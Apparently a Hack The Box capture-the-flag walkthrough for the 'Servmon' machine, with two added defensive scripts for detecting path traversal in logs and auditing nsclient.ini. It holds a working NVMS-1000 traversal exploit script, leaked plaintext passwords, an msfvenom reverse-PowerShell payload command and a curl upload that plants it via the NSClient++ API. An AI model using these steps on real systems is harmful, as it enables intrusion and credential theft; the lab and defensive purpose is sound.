Servmon is a new machine that receives very low ratings because many people complain that the NSClient++ web portal is "unstable". This can be worked around by using the Chromium browser (if you are using Kali Linux as root, run chromium --no-sandbox). You cannot log in to this portal remotely because it is restricted to localhost only, but this can be circumvented with an SSH tunnel.

nmap scan

nmap -sC -sV -oN servmon -vvv
In summary these are the ports:

21/tcp   open  ftp           syn-ack ttl 127 Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20  12:05PM                 Users
| ftp-syst:
|_  SYST: Windows_NT
22/tcp   open  ssh           syn-ack ttl 127 OpenSSH for_Windows_7.7 (protocol 2.0)
80/tcp   open  http          syn-ack ttl 127
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds? syn-ack ttl 127
5666/tcp open  tcpwrapped    syn-ack ttl 127
6699/tcp open  napster?      syn-ack ttl 127
8443/tcp open  ssl/https-alt syn-ack ttl 127

Host script results:
|_clock-skew: 2m30s
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 40676/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 20065/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 54993/udp): CLEAN (Failed to receive data)
|   Check 4 (port 62863/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-04-15T04:42:56
|_  start_date: N/A

I tested ports 139 and 445 and did web fuzzing on the target; I could not find an entry point through SMB, and web fuzzing did not enumerate any useful directory either:

DIRB v2.22
By The Dark Raver

OUTPUT_FILE: dirb_result
START_TIME: Thu Apr 16 11:10:01 2020
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt



---- Scanning URL: ----
+ (CODE:200|SIZE:1150)
+ (CODE:200|SIZE:340)

END_TIME: Thu Apr 16 11:38:15 2020

NVMS-1000 web portal

Searching the web with DuckDuckGo, I found that NVMS-1000 has a path traversal vulnerability.

On searchsploit the exploit can be found:

Reading the exploit documentation, you will see a PoC:

curl http://[IP Address]/../../../mnt/mtd/config/config.dat 2>/dev/null | strings

I tested this with msfconsole and confirmed that files can be downloaded.

The NSClient++ configuration file can be downloaded from the path /program+files/nsclient%2B%2B/nsclient.ini. Keep in mind that the file path is part of a URI, so the "/" and the space have to be URL-encoded.
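From the defender's side, the requests described above leave a clear trace in the web server's access log: the traversal sequence arrives percent-encoded ("..%2F"), sometimes double-encoded, so a naive search for "../" misses it. The following is an added example (not part of the original writeup, and not NVMS-1000 code) that normalises request paths by decoding them repeatedly and flags any path containing a ".." segment. The log lines are constructed for this example; the format mimics a common access-log layout.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the page). The last two mimic the
# encoded traversal requests this writeup describes against the NVMS-1000 portal;
# the second of them is double-encoded (%252e = %2e = ".").
SAMPLE_LOG = """\
10.0.0.5 - - [16/Apr/2020:11:10:01 +0000] "GET /index.html HTTP/1.1" 200 1150
10.0.0.5 - - [16/Apr/2020:11:10:02 +0000] "GET /css/style.css HTTP/1.1" 200 340
10.0.0.9 - - [16/Apr/2020:11:12:44 +0000] "GET /..%2F..%2F..%2Fprogram+files%2Fnsclient%2B%2B%2Fnsclient.ini HTTP/1.1" 200 2048
10.0.0.9 - - [16/Apr/2020:11:12:59 +0000] "GET /%252e%252e/%252e%252e/Users/Nathan/Desktop/Passwords.txt HTTP/1.1" 200 156
"""

# Common/combined access-log layout: client, identd, user, [timestamp] "METHOD path PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)


def normalise_path(raw, max_rounds=3):
    """Percent-decode until the string stops changing (bounded), so that
    double- or triple-encoded traversals collapse to plain '..' segments.
    Backslashes are folded to '/' because Windows servers accept both."""
    current = raw
    for _ in range(max_rounds):
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
    return current.replace("\\", "/")


def is_traversal(path):
    """True if any path segment (query string excluded) is exactly '..'.
    Checking whole segments avoids false positives on names like 'a..b'."""
    decoded = normalise_path(path)
    segments = decoded.split("?", 1)[0].split("/")
    return ".." in segments


def find_traversal(log_text):
    """Return (client_ip, raw_path, status) for every request whose decoded
    path contains a traversal segment. A 200 status on such a request is the
    signal worth alerting on: the server served the file."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the expected layout
        if is_traversal(m["path"]):
            hits.append((m["ip"], m["path"], int(m["status"])))
    return hits


if __name__ == "__main__":
    for ip, path, status in find_traversal(SAMPLE_LOG):
        print(f"{ip} traversal status={status} path={path}")
```

The decode loop is bounded on purpose: an attacker-controlled string could otherwise be crafted to keep decoding forever, and three rounds already cover the encodings seen in practice. In a real deployment, pair the alert with the response status so that successful reads (200) are triaged before blocked ones.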


In nsclient.ini a plaintext password for NSClient++ is found. This is used when rooting the machine, but first we need to find the user flag.

User’s flag hint

FTP to the target; this FTP server allows anonymous login.
Then enumerate the directories once the connection is established.
Download the files in the respective directories to find out what they are.

Looking at Confidential.txt, I found out where to look for passwords.

Reading Notes to do.txt, I understood that NSClient++ cannot be accessed remotely. This matches nsclient.ini, which only allows

Looking at nsclient.ini

Download password.txt

I will be using the same NVMS-1000 path traversal exploit to download the Passwords.txt file.
I could use the same exploit in msfconsole to do it, but I decided to write my own Python script to download the file.

import requests

# The "../" sequences have to be URL-encoded for the web server to accept them.
# I fuzzed the number of traversals until it returned nsclient.ini.
traversal = "..%2F"
web = "http"
host = "TARGET_IP"  # placeholder: the target address does not appear on this page
port = 80
outfile = "passwords.txt"
# On msfconsole use auxiliary/scanner/http/tvt_nvms_traversal
# and set filepath to /Users/Nathan/Desktop/Passwords.txt
filepath = "Users%2FNathan%2FDesktop%2FPasswords.txt"
uri = f"{web}://{host}:{port}/{traversal * 3}{filepath}"
response = requests.get(uri, verify=False)
if response.status_code == 200:
    with open(f"/root/htb/servmon/{outfile}", "w") as file:
        file.write(response.text)

There are several passwords in the file. I tested each password for both nathan and nadine over SSH and finally connected as nadine with this password: L1k3B1gBut7s@W0rk

Get user’s flag

ssh nadine@ with the password found.

Privilege escalation

As only localhost is allowed to access the NSClient++ web portal, I need an SSH tunnel to bypass this restriction. Also, the web portal may not display properly in Firefox; I recommend using Chromium, which works much better.

ssh -L 8080: nadine@
This is the command line to set up the SSH tunnel. It makes your attacking machine listen on local port 8080; traffic sent to that port travels through the SSH session to the remote machine, which delivers it to its own localhost on port 8443.

This is how I use chromium --no-sandbox to open the NSClient++ web UI and log in with the password discovered in nsclient.ini.
This is the NSClient++ password discovered: ew2x6SsGTxjRwXOT
There is a vulnerability in NSClient++ that you can find with searchsploit nsclient.

You can read the instructions. The prerequisites are that CheckExternalScripts and Scheduler are enabled; you can check in the web UI that these two modules are enabled.
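Those two prerequisites, together with the localhost-only restriction and the plaintext password mentioned earlier, are exactly the settings an administrator should review in nsclient.ini. The following is an added example, written for this page and not taken from NSClient++ or the original writeup, that parses an nsclient.ini and reports the risky combination. The section and key names ([/modules], [/settings/default], "allowed hosts", "password") follow the NSClient++ ini layout as an assumption of this example; the sample file content is constructed and uses a placeholder password.

```python
import configparser
import ipaddress

# Constructed sample nsclient.ini (not the file from the box). Section/key names
# are assumed to follow the NSClient++ ini layout; the password is a placeholder.
SAMPLE_INI = """\
; constructed sample for the audit example
[/modules]
CheckExternalScripts = enabled
Scheduler = enabled
WEBServer = enabled
CheckSystem = enabled

[/settings/default]
allowed hosts = 127.0.0.1
password = EXAMPLE_PLAINTEXT_PASSWORD
"""

# Modules whose presence widens the attack surface of the agent.
RISKY_MODULES = {"CheckExternalScripts", "Scheduler", "WEBServer"}
TRUE_VALUES = {"enabled", "1", "true"}


def load_ini(text):
    """Parse NSClient++-style ini text; keys stay case-sensitive and '%' is literal."""
    cp = configparser.ConfigParser(interpolation=None, allow_no_value=True)
    cp.optionxform = str  # do not lowercase module names
    cp.read_string(text)
    return cp


def is_loopback(host):
    """True for 127.0.0.0/8, ::1 (as address or CIDR) or the literal 'localhost'."""
    try:
        return ipaddress.ip_network(host, strict=False).is_loopback
    except ValueError:
        return host.lower() == "localhost"


def audit(text):
    """Return a list of human-readable findings for the given ini text."""
    cp = load_ini(text)
    findings = []

    modules = dict(cp["/modules"]) if cp.has_section("/modules") else {}
    enabled = {m for m, v in modules.items() if (v or "").strip().lower() in TRUE_VALUES}
    for m in sorted(RISKY_MODULES & enabled):
        findings.append(f"module {m} is enabled")
    if {"CheckExternalScripts", "Scheduler"} <= enabled:
        findings.append("CheckExternalScripts and Scheduler are both enabled: "
                        "external scripts can be added and scheduled to run")

    default = dict(cp["/settings/default"]) if cp.has_section("/settings/default") else {}
    hosts = [h.strip() for h in (default.get("allowed hosts") or "").split(",") if h.strip()]
    for h in hosts:
        if not is_loopback(h):
            findings.append(f"allowed hosts includes non-loopback entry {h}")

    if (default.get("password") or "").strip():
        findings.append("plaintext password stored in nsclient.ini: restrict file "
                        "permissions to the service account and rotate it if exposed")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_INI):
        print("-", finding)
```

The "allowed hosts" check is what turned the localhost restriction in this box into a speed bump rather than a wall: once any account on the host can open an SSH tunnel, a loopback-only listener is reachable, so the check should be read together with the plaintext-password finding, since the traversal bug is what exposed that password.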

I tried to add my own scripts in the web UI but had problems configuring them, so I turned to the NSClient++ API instead and used the add-script API.
I tried to upload nc.exe but it was deleted; I suspect it was quarantined by Windows Defender. A reverse-shell PowerShell script I uploaded was also deleted. The solution was to use msfvenom to create a batch file that triggers a PowerShell payload from within the batch file.
msfvenom -p cmd/windows/reverse_powershell lhost= lport=4444 -o evilps.bat


Use this curl command to upload the batch file from my attacking machine to Servmon.
curl -s -k -u admin -X PUT https://localhost:8080/api/v1/scripts/ext/scripts/evilps.bat --data-binary @evilps.bat
Notice the address is https://localhost:8080, which goes through the SSH tunnel.

Set up the multi/handler in msfconsole with the same payload I used for msfvenom.

Then run the command in the NSClient++ web UI console.

